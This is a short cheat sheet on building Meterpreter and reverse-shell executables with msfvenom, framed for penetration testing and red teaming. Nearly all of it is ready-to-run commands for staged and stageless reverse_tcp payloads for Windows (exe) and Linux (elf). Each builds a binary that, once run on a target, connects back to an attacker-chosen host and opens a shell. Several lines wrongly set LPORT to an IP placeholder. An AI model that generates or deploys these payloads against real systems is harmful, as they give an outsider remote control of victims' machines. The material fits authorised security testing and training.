Creating a Meterpreter Binary

Introduction

Creating a Meterpreter binary involves generating a payload that, when executed on a target system, establishes a connection back to the attacker’s machine, providing a versatile and powerful interface for post-exploitation activities. This process is often a crucial aspect of penetration testing or red teaming exercises.

Using msfvenom

Windows

Staged Payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<IP> -f exe > shell-x86.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Stageless Payload:

msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<IP> -f exe > shell-x86.exe

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Linux

Staged Payload:

msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Stageless Payload:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Check below link for more exploit and payload usage of msfvenom: https://www.offsec.com/metasploit-unleashed/msfvenom/

Video Demonstration

References

• https://www.offsec.com/metasploit-unleashed/generating-payloads/
• https://www.offsec.com/metasploit-unleashed/msfvenom/
• https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/